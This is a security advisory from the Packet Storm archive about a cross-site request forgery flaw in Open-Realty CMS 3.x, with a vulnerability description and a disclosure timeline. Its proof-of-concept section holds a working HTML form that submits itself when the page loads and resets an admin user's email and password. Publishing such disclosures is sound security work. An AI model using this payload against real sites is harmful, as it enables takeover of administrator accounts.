what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Open-Realty CMS 3.x Cross Site Request Forgery

Open-Realty CMS 3.x Cross Site Request Forgery
Posted Dec 26, 2012
Authored by Aung Khant | Site yehg.net

Open-Realty CMS version 3.x suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 2b916cbe37121f14334fce0ef4849bd7375ef4448a54c1de76c553816074d9da

Open-Realty CMS 3.x Cross Site Request Forgery

Change Mirror Download
1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty 3.x versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists
because the application does not require multiple steps or explicit
confirmation for sensitive transactions for majority of administrator
functions such as adding new user, assigning user to administrative
privilege. By using a crafted URL, an attacker may trick the victim
into visiting to his web page to take advantage of the trust
relationship between the authenticated victim and the application.
Such an attack could trick the victim into executing arbitrary
commands in the context of their session with the application, without
further prompting or verification.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

<!-- Change Password -->
<form action="http://127.0.0.1/admin/ajax.php?action=ajax_update_user_data"
method="POST">
<input type="hidden" name="user_id" value="2" />
<input type="hidden" name="user_first_name" value="Well" />
<input type="hidden" name="user_last_name" value="Smith" />
<input type="hidden" name="user_email" value="hacker@yehg.net" />
<input type="hidden" name="phone" value="123456789" />
<input type="hidden" name="mobile" value="9151403793" />
<input type="hidden" name="fax" value="" />
<input type="hidden" name="homepage" value="http://yehg.net" />
<input type="hidden" name="info" value="test" />
<input type="hidden" name="edit_user_pass" value="agent" />
<input type="hidden" name="edit_user_pass2" value="agent" />
<input type="submit" value="Submit form" />
</form>
<script>
document.forms[0].submit();
</script>


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_csrf
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close